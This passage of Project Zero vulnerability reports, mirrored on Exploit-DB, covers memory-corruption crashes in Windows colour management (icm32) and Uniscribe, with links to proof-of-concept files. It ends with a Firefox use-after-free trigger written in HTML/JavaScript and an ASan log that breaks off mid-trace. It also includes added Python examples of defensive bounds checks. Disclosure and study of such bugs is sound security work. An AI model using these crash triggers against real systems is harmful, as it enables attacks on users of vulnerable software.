002bf644 6ac4ca1d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_LutsFromLut16+0xe6
002bf670 6ac4cd0d 002bf9a0 002bf818 42324130 icm32!ExtractAll_MFT_Luts+0x8c
002bf700 6ac4d562 002bf9a0 002bf818 00000000 icm32!ExtractAllLuts+0x2a5
002bfa0c 6ac4e947 07c46e58 07c44fe8 07c48ef8 icm32!CreateCombi+0x725
002bfbb0 6ac43c84 07c46e58 07c44fe8 00000000 icm32!PrepareCombiLUTs+0x3a6
002bfd5c 6ac42dba 07c46e58 07c44fe8 07c44fe8 icm32!CMMConcatInitPrivate+0x23e
002bfd78 6ac41630 002bfde4 07c44fe8 002bfea8 icm32!CWConcatColorWorld4MS+0x42
002bfda4 6ac41fce 002bfde4 00080000 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
002bfdcc 6c5ec8af 002bfe98 00000004 002bfea8 icm32!CMCreateMultiProfileTransform+0x20
002bfe40 011c1923 002bfe98 00000004 002bfea8 mscms!CreateMultiProfileTransform+0x22d
[...]
---

Attached is a color profile which triggers the above crash. In order to reproduce it, it is necessary to use a dedicated program which loads the file and creates a color transform.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41657.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1053

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ScriptApplyLogicalWidth function, while trying to display a malformed EMF file:

---
(920c.9190): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001e6fe4 ebx=00000000 ecx=00000007 edx=00000000 esi=00000007 edi=00000007
eip=751e6f3c esp=002ef0c8 ebp=002ef0ec iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptApplyLogicalWidth+0x10c:
751e6f3c 8b04b8          mov     eax,dword ptr [eax+edi*4] ds:002b:001e7000=????????
0:000> kb
ChildEBP RetAddr  Args to Child              
002ef0ec 751f4039 001e6fe4 0000008f 0000008f USP10!ScriptApplyLogicalWidth+0x10c
002ef140 751f435d 00000105 002ef170 0a6a1cbc USP10!ApplyPiDxToItem+0x89
002ef184 751e7a04 ffffffff 00000004 000000a0 USP10!ScriptStringAnalyzeGlyphs+0x20d
002ef19c 76ca5465 1d011f2d 0a6a1bd8 00001000 USP10!ScriptStringAnalyse+0x284
002ef1e8 76ca3a3d 1d011f2d 0935f000 00001000 LPK!LpkStringAnalyse+0xe5
002ef238 76ca3af2 1d011f2d 00000064 00000064 LPK!InternalTextOut+0x1cd
002ef26c 76ccda50 1d011f2d 00000064 00000064 LPK!LpkExtTextOut+0x32
002ef7d8 76ccda90 1d011f2d 00000064 00000064 GDI32!ExtTextOutInternalA+0x3aa
002ef804 76ce7fed 1d011f2d 00000064 00000064 GDI32!ExtTextOutA+0x24
002ef838 76cd50cd 1d011f2d 04ed8ff8 00000002 GDI32!MREXTTEXTOUT::bPlay+0x7f
002ef8b0 6c85fc37 1d011f2d 04ed8ff8 001e01e8 GDI32!PlayEnhMetaFileRecord+0x2c5
002ef8c8 6c860e3a 00000053 07bdbcb0 00006044 gdiplus!EmfEnumState::PlayRecord+0x3a
002ef8e0 6c83881a 00000053 00006044 001e01f0 gdiplus!EmfEnumState::ProcessRecord+0xb1
002ef8fc 6c8389e0 00000053 00000000 00006044 gdiplus!GdipPlayMetafileRecordCallback+0x6c
002ef924 76cd58a4 1d011f2d 04ed8ff8 001e01f0 gdiplus!EnumEmfDownLevel+0x6e
002ef9b0 6c83abb4 1d011f2d 403581b3 6c838972 GDI32!bInternalPlayEMF+0x6a3
002ef9e8 6c83d317 1d011f2d 924626c1 002efa74 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
002efa90 6c83f3c1 00000000 924626c1 002efbd8 gdiplus!GpGraphics::EnumEmf+0x391
002efbf0 6c8448c9 00000000 00000001 00000001 gdiplus!GpMetafile::EnumerateForPlayback+0x5a7
002efcec 6c84494d 07bd5f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
002efd50 6c80e03f 07bd5f28 002efd78 002efd88 gdiplus!GpGraphics::DrawImage+0x51
002efdb8 6c80e0d3 07bd1d28 438f3857 00000000 gdiplus!GdipDrawImage+0x130
002efde4 013e1747 07bd1d28 07bd5f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).

Attached is an EMF file which triggers the crash.
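
The EmfPlusSetTSClip report above attributes its crash to a record-size check that is missing relative to the declared rectangle count, and the page gives no root cause for the USP10 crash. As an added example, not code from the reports, from GDI+ or from Uniscribe, the Python below shows the shape of that check for both record types: an EmfPlusSetTSClip parser that compares NumRects against DataSize before reading any rectangle, and an EMR_EXTTEXTOUTA parser that compares offString and offDx plus their lengths against the record Size before touching the string or the Dx array. Record layouts follow MS-EMFPLUS and MS-EMF; the signedness of the compressed rectangle fields, the build_* helpers and the sample records are assumptions constructed for this example.

```python
"""Bounds checks for two metafile records before any array inside them is read.

Added example, not code from the reports above or from GDI+/Uniscribe. Record
layouts follow MS-EMFPLUS (EmfPlusSetTSClip) and MS-EMF (EMR_EXTTEXTOUTA); the
build_* helpers and the sample records are constructed test input.
"""
import struct

EMFPLUS_SETTSCLIP = 0x403A  # EmfPlusSetTSClip record type
EMR_EXTTEXTOUTA = 0x53      # EMR_EXTTEXTOUTA record type
ETO_PDY = 0x2000            # EmrText.Options: Dx array holds (dx, dy) pairs


class RecordError(ValueError):
    """Raised instead of reading outside the record."""


def parse_settsclip(buf):
    """EMF+ SetTSClip: header (Type, Flags, Size, DataSize), then NumRects rects."""
    if len(buf) < 12:
        raise RecordError("short EMF+ record header")
    rtype, flags, size, data_size = struct.unpack_from("<HHII", buf, 0)
    if rtype != EMFPLUS_SETTSCLIP:
        raise RecordError("not an EmfPlusSetTSClip record")
    if size < 12 or size > len(buf) or data_size != size - 12:
        raise RecordError("Size/DataSize disagree with the bytes present")
    compressed = bool(flags & 0x8000)   # C bit: 1-byte fields instead of 2-byte
    num_rects = flags & 0x7FFF          # NumRects: low 15 bits of Flags
    rect_size = 4 if compressed else 8
    # The check the report describes as missing: the declared rectangle count
    # must fit in the bytes the record actually carries.
    if num_rects * rect_size > data_size:
        raise RecordError(f"{num_rects} rects declared, {data_size} data bytes present")
    fmt = "<4B" if compressed else "<4h"   # byte fields treated as unsigned (assumption)
    return [struct.unpack_from(fmt, buf, 12 + k * rect_size) for k in range(num_rects)]


def parse_exttextouta(buf):
    """EMR_EXTTEXTOUTA: 36-byte EMR header + 40-byte EmrText, then string and Dx array."""
    if len(buf) < 76:
        raise RecordError("short EMR_EXTTEXTOUTA record")
    rtype, size = struct.unpack_from("<II", buf, 0)
    if rtype != EMR_EXTTEXTOUTA:
        raise RecordError("not an EMR_EXTTEXTOUTA record")
    if size < 76 or size > len(buf) or size % 4:
        raise RecordError("Size disagrees with the bytes present")
    chars, off_string, options = struct.unpack_from("<III", buf, 44)
    (off_dx,) = struct.unpack_from("<I", buf, 72)
    # Offsets are relative to the record start; offset + length is compared
    # against Size before either array is touched.
    if off_string > size or chars > size - off_string:
        raise RecordError("string runs past the record")
    n_dx = chars * (2 if options & ETO_PDY else 1)
    if off_dx > size or n_dx * 4 > size - off_dx:
        raise RecordError("Dx array runs past the record")
    text = buf[off_string:off_string + chars]
    dx = list(struct.unpack_from("<%di" % n_dx, buf, off_dx))
    return text, dx


def is_rejected(parser, buf):
    """True when the parser refuses the record instead of reading out of bounds."""
    try:
        parser(buf)
    except RecordError:
        return True
    return False


def build_settsclip(declared, rects, compressed=False):
    """Constructed record; `declared` may exceed len(rects) to mimic a bad file."""
    fmt = "<4B" if compressed else "<4h"
    body = b"".join(struct.pack(fmt, *r) for r in rects)
    flags = (0x8000 if compressed else 0) | declared
    return struct.pack("<HHII", EMFPLUS_SETTSCLIP, flags, 12 + len(body), len(body)) + body


def build_exttextouta(text, dx, off_dx=None, options=0):
    """Constructed record with the string at offset 76 and the Dx array after it."""
    padded = text + b"\0" * (-len(text) % 4)
    dx_off = 76 + len(padded)
    dx_bytes = struct.pack("<%di" % len(dx), *dx)
    size = dx_off + len(dx_bytes)
    header = struct.pack("<II", EMR_EXTTEXTOUTA, size) + bytes(28)  # Bounds, mode, scales zeroed
    emrtext = struct.pack("<8xIII16xI", len(text), 76, options, dx_off if off_dx is None else off_dx)
    return header + emrtext + padded + dx_bytes


if __name__ == "__main__":
    good = build_settsclip(2, [(0, 0, 10, 10), (5, 5, 20, 20)])
    print("SetTSClip ok:", parse_settsclip(good))
    lying = build_settsclip(200, [(0, 0, 10, 10)])     # claims 200 rects, carries one
    print("SetTSClip rejected:", is_rejected(parse_settsclip, lying))
    print("ExtTextOut ok:", parse_exttextouta(build_exttextouta(b"Hello", [7] * 5)))
    bad_dx = build_exttextouta(b"Hi", [1, 2], off_dx=0x7000)  # Dx offset beyond Size
    print("ExtTextOut rejected:", is_rejected(parse_exttextouta, bad_dx))
```

Both parsers fail closed with RecordError, which is what a fuzzing harness or a document sanitiser wants from a record reader; is_rejected turns that into a boolean so the outcome of a malformed sample can be asserted rather than observed as a crash.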


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41658.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1054

We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function, while trying to translate colors based on a malformed color profile file:

---
(61e4.8620): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000453 ecx=0922cafd edx=00000c63 esi=0038f7ac edi=0004be40
eip=6ac573e9 esp=0038f6ec ebp=0038f784 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a:
6ac573e9 0fb61411        movzx   edx,byte ptr [ecx+edx]     ds:002b:0922d760=??
0:000> kb
ChildEBP RetAddr  Args to Child              
0038f784 6ac57844 0038f7ac 0038f840 00000000 icm32!LHCalc3toX_Di16_Do16_Lut8_G32+0x32a
0038f798 6ac4807d 0038f7ac 0038f840 76f611a9 icm32!LHCalc3to3_Di16_Do16_Lut8_G32+0x12
0038f8ac 6ac4204c 07b46e58 085f1000 000285c3 icm32!LHMatchColorsPrivate+0xef
0038f8c0 6c5ecab5 00000100 07de1000 000285c3 icm32!CMTranslateColors+0x44
0038f940 011c1963 4f42e2c8 07de1000 000285c3 mscms!TranslateColors+0x108
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it is necessary to use a dedicated program which loads the file, creates a color transform and translates some colors.

Attached are two color profiles which trigger the crash at two different offsets within the icm32!LHCalc3toX_Di16_Do16_Lut8_G32 function.
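
Three of the reports above are out-of-bounds reads while icm32 copies tables out of lut16Type tags (Fill_ushort_ELUTs_from_lut16Tag, Fill_byte_ALUTs_from_lut16Tag) and indexes a lut8Type CLUT (LHCalc3toX_Di16_Do16_Lut8_G32). As an added example, not code from the reports or from icm32.dll, the Python below validates the sizes a lut16Type or lut8Type tag implies (channel counts, grid points, entry counts) against the bytes the tag actually holds before any table is extracted. The tag layouts follow the ICC profile specification; the channel limit of 15, the build_* helpers and the sample tags are assumptions constructed for this example.

```python
"""Size validation for ICC lut16Type ('mft2') and lut8Type ('mft1') tags.

Added example, not code from the reports above or from icm32.dll. Tag layout
follows the ICC profile specification; build_lut16/build_lut8 and the sample
tags are constructed test input, and the channel limit of 15 is an assumption.
"""
import struct


class ProfileError(ValueError):
    """Raised instead of copying tables that the tag does not actually contain."""


def _lut_header(tag):
    """Fields shared by both types: signature, i/o channel counts, CLUT grid points."""
    if len(tag) < 48:
        raise ProfileError("lut tag shorter than its 48-byte fixed header")
    sig, i, o, g = tag[:4], tag[8], tag[9], tag[10]
    if not (1 <= i <= 15 and 1 <= o <= 15):
        raise ProfileError(f"unsupported channel counts in={i} out={o}")
    if g < 2:
        raise ProfileError("CLUT must have at least 2 grid points per axis")
    return sig, i, o, g


def _check_fits(tag, need, what):
    # In C this comparison needs overflow-safe arithmetic: g**i * o * 2 can wrap
    # a 32-bit product for large grids. Python integers make the comparison exact.
    if need > len(tag):
        raise ProfileError(f"{what}: tag declares {need} bytes but holds {len(tag)}")


def parse_lut16(tag):
    """lut16Type: uint16 input tables, uint16 CLUT, uint16 output tables."""
    sig, i, o, g = _lut_header(tag)
    if sig != b"mft2":
        raise ProfileError("not a lut16Type tag")
    if len(tag) < 52:
        raise ProfileError("lut16Type needs the entry-count fields at offset 48")
    n, m = struct.unpack_from(">HH", tag, 48)
    if not (2 <= n <= 4096 and 2 <= m <= 4096):
        raise ProfileError(f"table entry counts out of range: in={n} out={m}")
    in_n, clut_n, out_n = i * n, (g ** i) * o, o * m
    _check_fits(tag, 52 + 2 * (in_n + clut_n + out_n), "lut16Type")
    off, tables = 52, {}
    for name, count in (("input", in_n), ("clut", clut_n), ("output", out_n)):
        tables[name] = struct.unpack_from(">%dH" % count, tag, off)
        off += 2 * count
    tables.update(channels_in=i, channels_out=o, grid=g)
    return tables


def parse_lut8(tag):
    """lut8Type: 256-entry byte input/output tables, byte CLUT."""
    sig, i, o, g = _lut_header(tag)
    if sig != b"mft1":
        raise ProfileError("not a lut8Type tag")
    in_n, clut_n, out_n = i * 256, (g ** i) * o, o * 256
    _check_fits(tag, 48 + in_n + clut_n + out_n, "lut8Type")
    off, tables = 48, {}
    for name, count in (("input", in_n), ("clut", clut_n), ("output", out_n)):
        tables[name] = tag[off:off + count]
        off += count
    tables.update(channels_in=i, channels_out=o, grid=g)
    return tables


def is_rejected(parser, tag):
    """True when the parser refuses the tag instead of reading past it."""
    try:
        parser(tag)
    except ProfileError:
        return True
    return False


IDENTITY = struct.pack(">9i", 0x10000, 0, 0, 0, 0x10000, 0, 0, 0, 0x10000)  # s15Fixed16 identity matrix


def build_lut16(i, o, g, n, m, declared_g=None):
    """Constructed tag; declared_g lets a test advertise a CLUT larger than the one present."""
    hdr = b"mft2" + bytes(4) + bytes([i, o, g if declared_g is None else declared_g, 0]) + IDENTITY
    hdr += struct.pack(">HH", n, m)
    return hdr + bytes(2 * (i * n + (g ** i) * o + o * m))


def build_lut8(i, o, g, declared_g=None):
    """Constructed lut8Type tag with zeroed tables sized for the real grid."""
    hdr = b"mft1" + bytes(4) + bytes([i, o, g if declared_g is None else declared_g, 0]) + IDENTITY
    return hdr + bytes(i * 256 + (g ** i) * o + o * 256)


if __name__ == "__main__":
    print("lut16 ok, CLUT entries:", len(parse_lut16(build_lut16(3, 3, 2, 2, 2))["clut"]))
    print("lut16 lying about grid rejected:",
          is_rejected(parse_lut16, build_lut16(3, 3, 2, 2, 2, declared_g=17)))
    print("lut8 ok, CLUT bytes:", len(parse_lut8(build_lut8(3, 1, 2))["clut"]))
    print("lut8 truncated rejected:", is_rejected(parse_lut8, build_lut8(3, 1, 2)[:-1]))
```

The two malformed cases are the ones the stack traces suggest: a tag whose header advertises more grid points (or channels) than the CLUT bytes that follow, and a tag cut short so that the last table is only partially present. Rejecting both before extraction keeps the later LUT-filling and colour-translation stages from ever seeing a table they can read past.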


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41659.zip
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1130

Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340138

There is a use-after-free security vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build. 

PoC and ASan log can be found below.
Notes for reproducing:
 - PoC uses domFuzzLite3 extension (https://www.squarefree.com/extensions/domFuzzLite3.xpi) in order to trigger the garbage collector
 - After the PoC is opened, it takes about 10 seconds for the crash to occur

PoC:

=================================================================
-->

<style>
body { display: table }
</style>
<script>
function freememory() {
  try { fuzzPriv.forceGC(); } catch(err) { alert('Please install domFuzzLite3'); }
}
function go() {
  var s = document.getSelection();
  window.find("1",true,false,true,false);
  s.modify("extend","forward","line");
  document.body.append(document.createElement("table"));
  freememory()
}
</script>
<body onload=go()>
<table>
<th>u~Z1Cqn`aA}SOkre=]{</th>
</table>
<progress></progress>

<!--
=================================================================

ASan log:

=================================================================
==119582==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000214ce8 at pc 0x7f46d6781c12 bp 0x7ffdc29fc1f0 sp 0x7ffdc29fc1e8
READ of size 8 at 0x60b000214ce8 thread T0
    #0 0x7f46d6781c11 in operator! /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36
    #1 0x7f46d6781c11 in IsInSelection /home/worker/workspace/build/src/dom/base/nsRange.h:120
    #2 0x7f46d6781c11 in nsRange::IsNodeSelected(nsINode*, unsigned int, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:202
    #3 0x7f46da800fd3 in nsIFrame::IsSelected() const /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:10107:5
    #4 0x7f46daaa29f6 in nsTableCellFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableCellFrame.cpp:539:11
    #5 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #6 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
    #7 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #8 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #9 0x7f46dab10731 in DisplayRows(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableRowGroupFrame.cpp:231:5
    #10 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #11 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #12 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
    #13 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
    #14 0x7f46daabb382 in nsTableFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1373:3
    #15 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #16 0x7f46dab24b16 in BuildDisplayListForInnerTable /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:207:5
    #17 0x7f46dab24b16 in nsTableWrapperFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:180
    #18 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #19 0x7f46da7912d2 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6585:5
    #20 0x7f46da7890ce in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6677:7
    #21 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #22 0x7f46da7b22f2 in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:558:5
    #23 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #24 0x7f46da87ebf2 in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:3497:7
    #25 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #26 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
    #27 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #28 0x7f46da990123 in nsSubDocumentFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:471:7
    #29 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #30 0x7f46da78d228 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2910:5
    #31 0x7f46dac92672 in nsStackFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsStackFrame.cpp:59:5
    #32 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #33 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #34 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #35 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #36 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #37 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #38 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #39 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #40 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #41 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #42 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #43 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #44 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #45 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #46 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #47 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #48 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #49 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #50 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #51 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #52 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #53 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #54 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #55 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #56 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #57 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #58 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
    #59 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
